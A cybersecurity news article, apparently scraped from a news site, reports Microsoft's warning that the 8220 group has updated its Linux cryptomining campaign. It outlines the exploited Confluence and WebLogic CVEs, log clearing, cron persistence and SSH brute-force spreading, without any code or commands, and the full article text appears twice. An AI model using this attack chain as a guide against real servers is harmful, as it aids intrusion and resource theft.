Microsoft Spots Updated Cryptomining Malware Tool Targeting Linux Systems

Microsoft’s Security Intelligence team has issued a new warning against a known cloud threat actor (TA) group.

Tracked as 8220 and active since early 2017the group would have now updated its malware toolset to breach Linux servers in order to install crypto miners as part of a long-running campaign.

“The updates include the deployment of new versions of a cryptominer and an IRC bot, as well as the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a Twitter thread on Thursday.

“The group has actively updated its techniques and payloads over the last year.”

According to Microsoft, the most recent campaign now targets i686 and x86_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Atlassian Confluence Server) and CVE-2019-2725 (Oracle WebLogic) for initial access.

“After initial access, a loader is downloaded,” explained the security experts. “This loader evades detection by clearing log files and disabling cloud monitoring and security tools. Tamper protection capabilities in Microsoft Defender for Endpoint help protect security settings. ”

The loader would then download the pwnRig crpytominer and an IRC bot that runs commands from a command-and-control (C2) server. It would then maintain persistence by creating either a cronjob or a script running every 60 seconds as nohup.

According to Microsoft, the malware also features self-propagating capabilities.

The loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts. ”

To protect networks against this threat, Microsoft said organizations should secure systems and servers, apply updates, and use good credential hygiene.

“Microsoft Defender for Endpoint on Linux detects malicious behaviors and payloads related to this campaign.”

The news comes days after Akamai suggested the Atlassian Confluence flaw is currently witnessing 20,000 exploitation attempts per day, launched from about 6,000 IPs.

For context, the number represents a substantial decrease when compared to the peak of 100,000 the company witnessed upon the bug disclosure on June 02 2022.

Source

Microsoft’s Security Intelligence team has issued a new warning against a known cloud threat actor (TA) group.

Tracked as 8220 and active since early 2017the group would have now updated its malware toolset to breach Linux servers in order to install crypto miners as part of a long-running campaign.

“The updates include the deployment of new versions of a cryptominer and an IRC bot, as well as the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a Twitter thread on Thursday.

“The group has actively updated its techniques and payloads over the last year.”

According to Microsoft, the most recent campaign now targets i686 and x86_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Atlassian Confluence Server) and CVE-2019-2725 (Oracle WebLogic) for initial access.

“After initial access, a loader is downloaded,” explained the security experts. “This loader evades detection by clearing log files and disabling cloud monitoring and security tools. Tamper protection capabilities in Microsoft Defender for Endpoint help protect security settings. ”

The loader would then download the pwnRig crpytominer and an IRC bot that runs commands from a command-and-control (C2) server. It would then maintain persistence by creating either a cronjob or a script running every 60 seconds as nohup.

According to Microsoft, the malware also features self-propagating capabilities.

The loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts. ”

To protect networks against this threat, Microsoft said organizations should secure systems and servers, apply updates, and use good credential hygiene.

“Microsoft Defender for Endpoint on Linux detects malicious behaviors and payloads related to this campaign.”

The news comes days after Akamai suggested the Atlassian Confluence flaw is currently witnessing 20,000 exploitation attempts per day, launched from about 6,000 IPs.

For context, the number represents a substantial decrease when compared to the peak of 100,000 the company witnessed upon the bug disclosure on June 02 2022.

Source

More from author

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Related posts

Advertismentspot_img

Latest posts

Multiple Vulnerabilities Discovered in Device42 Asset Management Appliance

A series of vulnerabilities on the popular asset management platform Device42 could be exploited to give attackers full root access to the system, according...

Top 5 best backup practices

Give yourself peace of mind by implementing a new backup strategy with our tips....

Indian Power Sector targeted with latest LockBit 3.0 variant

Estimated reading time: 5 minutesAfter the infamous Conti ransomware group was disbanded, its former members began to target the energy and power sectors...

Want to stay up to date with the latest news?

We would love to hear from you! Please fill in your details and we will stay in touch. It's that simple!